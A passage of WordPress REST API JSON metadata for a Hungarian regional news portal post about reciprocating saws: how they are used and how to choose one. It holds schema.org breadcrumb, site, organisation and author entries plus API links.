:[{"@type":"ReadAction","target":["https:\/\/dorogimedence.hu\/index.php\/2023\/11\/20\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\/"]}]},{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/11\/20\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\/#primaryimage","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2023\/11\/kardfuresz-5.jpg","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2023\/11\/kardfuresz-5.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/11\/20\/kardfuresz-mire-jo-hogyan-kell-hasznalni-es-mire-figyeljunk-a-kivalasztas-vasarlas-soran\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Kezd\u0151lap","item":"https:\/\/dorogimedence.hu\/"},{"@type":"ListItem","position":2,"name":"Kardf\u0171r\u00e9sz &#8211; mire j\u00f3, hogyan kell haszn\u00e1lni, \u00e9s mire figyelj\u00fcnk a kiv\u00e1laszt\u00e1s, v\u00e1s\u00e1rl\u00e1s sor\u00e1n?"}]},{"@type":"WebSite","@id":"https:\/\/dorogimedence.hu\/#website","url":"https:\/\/dorogimedence.hu\/","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","description":"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok","publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dorogimedence.hu\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"hu"},{"@type":"Organization","@id":"https:\/\/dorogimedence.hu\/#organization","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","url":"https:\/\/dorogimedence.hu\/","logo":{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","width":600,"height":100,"caption":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l"},"image":{"@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dorogimedence\/"]},{"@type":"Person","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4","name":"dorogimedence.hu","image":{"@type":"ImageObject","inLanguage":"hu","@id":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","url":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","contentUrl":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","caption":"dorogimedence.hu"}}]}},"_links":{"self":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/57943","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/comments?post=57943"}],"version-history":[{"count":0,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/57943\/revisions"}],"wp:attachment":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media?parent=57943"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/categories?post=57943"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/tags?post=57943"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}